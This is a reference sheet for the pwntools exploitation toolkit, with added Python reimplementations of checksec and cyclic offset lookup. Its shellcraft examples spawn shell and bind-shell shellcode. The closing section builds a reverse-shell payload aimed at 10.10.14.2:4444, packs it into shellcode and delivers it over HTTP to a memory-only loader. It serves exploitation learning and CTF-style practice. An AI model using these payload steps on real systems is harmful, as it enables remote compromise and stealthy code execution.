PwnTools

pip3 install pwntools

Pwn asm

Get opcodes from a line or from a file.

pwn asm "jmp esp"
pwn asm -i <filepath>

You can select:

  • output type (raw, hex, string, elf)
  • output file context (16, 32, 64, linux, windows...)
  • bytes to avoid (newlines, null, a list)
  • the encoder, debugging the shellcode with gdb and running the output

Pwn checksec

Checksec script

pwn checksec <executable>
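To show what `pwn checksec` actually derives its verdicts from, here is an added example (not pwntools' own checksec) that reads the NX, PIE and RELRO state straight from the ELF64 program headers and dynamic section, plus any PT_LOAD segment that is both writable and executable. It is useful for verifying a build's hardening flags on a box where pwntools is not installed. `build_sample_elf` produces a constructed, header-only sample so the script runs offline; all function names are assumptions of this example.

```python
import struct
import sys

# ELF constants (ELF64 spec / glibc elf.h)
ELF_MAGIC = b"\x7fELF"
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr, 56 bytes
DYN = struct.Struct("<QQ")                  # Elf64_Dyn, 16 bytes


def checksec(data: bytes) -> dict:
    """Report NX, PIE, RELRO and writable+executable PT_LOAD segments of a
    little-endian ELF64 image, reading only headers and the dynamic section."""
    fields = EHDR.unpack_from(data, 0)
    ident, e_type, e_phoff = fields[0], fields[1], fields[5]
    e_phentsize, e_phnum = fields[9], fields[10]
    if ident[:4] != ELF_MAGIC or ident[4] != ELFCLASS64 or ident[5] != ELFDATA2LSB:
        raise ValueError("not a little-endian ELF64 image")

    # tuple indices: 0 p_type, 1 p_flags, 2 p_offset, 3 p_vaddr, 5 p_filesz
    phdrs = [PHDR.unpack_from(data, e_phoff + i * e_phentsize) for i in range(e_phnum)]

    # NX: the kernel honours PT_GNU_STACK; no PF_X there means a non-executable
    # stack. A missing PT_GNU_STACK is reported as executable (historic x86 default).
    gnu_stack = [p for p in phdrs if p[0] == PT_GNU_STACK]
    nx = bool(gnu_stack) and not (gnu_stack[0][1] & PF_X)

    # RELRO: PT_GNU_RELRO alone is partial RELRO; full RELRO additionally needs
    # BIND_NOW so the GOT is resolved and made read-only before main() runs.
    has_relro = any(p[0] == PT_GNU_RELRO for p in phdrs)
    bind_now = False
    for p in phdrs:
        if p[0] != PT_DYNAMIC:
            continue
        off, size = p[2], p[5]
        for j in range(size // DYN.size):
            tag, val = DYN.unpack_from(data, off + j * DYN.size)
            if tag == DT_NULL:
                break
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                bind_now = True
    relro = "Full" if has_relro and bind_now else ("Partial" if has_relro else "No")

    # Any segment that is both writable and executable is a red flag on its own.
    rwx = [hex(p[3]) for p in phdrs
           if p[0] == PT_LOAD and (p[1] & (PF_W | PF_X)) == (PF_W | PF_X)]
    return {"NX": nx, "PIE": e_type == ET_DYN, "RELRO": relro, "RWX_segments": rwx}


def build_sample_elf(pie=True, nx=True, relro="full") -> bytes:
    """Constructed minimal ELF64 image (headers + a dynamic section, no code);
    sample input for offline use, not a runnable program."""
    n_ph = 4 if relro != "none" else 3
    dyn_off = EHDR.size + n_ph * PHDR.size
    dyn = DYN.pack(DT_FLAGS, DF_BIND_NOW if relro == "full" else 0) + DYN.pack(DT_NULL, 0)
    filesz = dyn_off + len(dyn)
    phdrs = [
        PHDR.pack(PT_LOAD, PF_R | PF_X, 0, 0, 0, filesz, filesz, 0x1000),
        PHDR.pack(PT_DYNAMIC, PF_R | PF_W, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 8),
        PHDR.pack(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16),
    ]
    if relro != "none":
        phdrs.append(PHDR.pack(PT_GNU_RELRO, PF_R, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 1))
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + bytes(8)
    ehdr = EHDR.pack(ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x1000,
                     EHDR.size, 0, 0, EHDR.size, PHDR.size, len(phdrs), 64, 0, 0)
    return ehdr + b"".join(phdrs) + dyn


def checksec_file(path: str) -> dict:
    with open(path, "rb") as f:
        return checksec(f.read())


if __name__ == "__main__":
    # With a path argument inspect that binary; otherwise run the constructed samples.
    if len(sys.argv) > 1:
        print(checksec_file(sys.argv[1]))
    else:
        for kw in ({}, {"nx": False}, {"pie": False, "relro": "partial"}):
            print(kw, checksec(build_sample_elf(**kw)))
```

The script reports `NX: False` whenever PT_GNU_STACK is missing or carries PF_X, `Full` RELRO only when a PT_GNU_RELRO segment is paired with a BIND_NOW flag in the dynamic section, and treats `ET_DYN` as PIE (a shared library also reports as PIE, same as simple checksec implementations). Stack canaries are not covered, since detecting them requires symbol or disassembly inspection rather than headers.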

Pwn constgrep

Pwn cyclic

Get a pattern

pwn cyclic 3000
pwn cyclic -l faad

You can select:

  • the alphabet used (lowercase letters by default)
  • the length of the unique subsequence (default 4)
  • context (16, 32, 64, linux, windows...)
  • look up an offset (-l)
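The pattern `pwn cyclic` emits is a de Bruijn sequence over the chosen alphabet: every window of the unique-subsequence length occurs at most once, which is what makes `-l` unambiguous. The following added example (plain Python, not pwntools code) re-implements both directions for crash triage: given a register value copied from a crash report or core dump, `cyclic_find` tells you which byte offset of the input ended up there, so a fuzzer crash can be mapped back to the input field that caused it. The names `ALPHABET`, `N`, `cyclic` and `cyclic_find` are choices of this example.

```python
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # same default alphabet as pwn cyclic
N = 4                                      # default unique-subsequence length


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) one character at a time using the
    FKM (Lyndon word) algorithm: every n-character window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=N):
    """Equivalent of `pwn cyclic <length>`: the first `length` characters."""
    if length > len(alphabet) ** n:
        raise ValueError("length exceeds what this alphabet/n can keep unique")
    return "".join(islice(de_bruijn(alphabet, n), length))


def cyclic_find(sub, alphabet=ALPHABET, n=N):
    """Equivalent of `pwn cyclic -l <sub>`: offset of an n-char window in the
    pattern. Accepts str, bytes, or an int read from a little-endian register
    in a crash report. Returns -1 if the window does not occur."""
    if isinstance(sub, int):
        sub = sub.to_bytes(n, "little")
    if isinstance(sub, bytes):
        sub = sub.decode("ascii")
    if len(sub) != n:
        raise ValueError(f"need exactly {n} characters")
    window = ""
    for i, ch in enumerate(de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]
        if window == sub:
            return i - n + 1
    return -1


if __name__ == "__main__":
    pattern = cyclic(3000)
    print(pattern[:64])
    # constructed register value: the four pattern bytes at offset 100, little-endian
    reg = int.from_bytes(pattern[100:104].encode(), "little")
    print(hex(reg), "->", cyclic_find(reg))
    print("faad ->", cyclic_find("faad"))
```

`cyclic_find` streams the generator rather than materialising the whole 26^4-character sequence, so lookups stay cheap even with a larger alphabet or `n`. If a crash report shows a value that is not found, the input was either mangled before it reached the register or the bytes came from somewhere other than the pattern, both worth knowing before drawing conclusions about the overflow.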

Pwn debug

Attach GDB to a process

pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash

You can select:

  • by executable, by name or by pid, plus the context (16, 32, 64, linux, windows...)
  • a gdbscript to execute
  • the sysroot path

Pwn disablenx

Disable NX on a binary

pwn disablenx <filepath>

Pwn disasm

Disassemble hex opcodes

pwn disasm ffe4

You can select:

  • context (16, 32, 64, linux, windows...)
  • base address
  • color (default) / no color

Pwn elfdiff

Show the differences between 2 files

pwn elfdiff <file1> <file2>

Pwn hex

Get the hexadecimal representation

pwn hex hola #Get hex of "hola" ascii

Pwn phd

Get a hexdump

pwn phd <file>

You can select:

  • the number of bytes to show
  • the number of bytes per line (and a byte to highlight)
  • how many bytes to skip at the beginning

Pwn pwnstrip

Pwn scramble

Pwn shellcraft

Get shellcodes

pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcodes with "amd" in the name
pwn shellcraft -f hex amd64.linux.sh #Output the shellcode as hex
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft -r amd64.linux.bindsh 9095 #Bind SH to port

You can select:

  • the shellcode and the arguments for the shellcode
  • output file
  • output format
  • debug (attach a debugger to the shellcode)
  • before (debug trap before the code)
  • after
  • opcodes to avoid (default: null and newline)
  • run the shellcode
  • color / no color
  • list syscalls
  • list possible shellcodes
  • generate the ELF as a shared library

Pwn template

Get a python template

pwn template

You can select: host, port, user, pass, path and quiet

Pwn unhex

From hex to string

pwn unhex 686f6c61

Pwn update

To update pwntools

pwn update

ELF → raw shellcode packing (loader_append)

Pwntools can turn a standalone ELF into a single raw shellcode blob that maps its own segments and transfers execution to the original entrypoint. This is ideal for memory-only loaders (e.g., Android apps that call JNI to execute downloaded bytes).

Typical workflow (amd64 example)

  1. Build a static, position-independent payload ELF (musl is recommended for portability):
musl-gcc -O3 -s -static -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
  2. Convert the ELF into shellcode with pwntools:
# exp2sc.py
from pwn import *
context.clear(arch='amd64')   # set the target architecture explicitly
elf = ELF('./exploit')
# loader_append embeds the whole ELF image and prepends a small loader stub
sc = asm(shellcraft.loader_append(elf.data, arch='amd64'))
with open('sc', 'wb') as f:
    f.write(sc)
print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes")
  3. Deliver sc to the memory loader (e.g., via HTTP[S]) and execute it inside the process.

Notes

  • loader_append embeds the original ELF program inside the shellcode and emits a small loader that mmaps the segments and jumps to the entry.
  • Be explicit about the architecture with context.clear(arch=...). arm64 is common on Android.
  • Make sure your payload code is position-independent and does not rely on assumptions about the process's ASLR/NX.
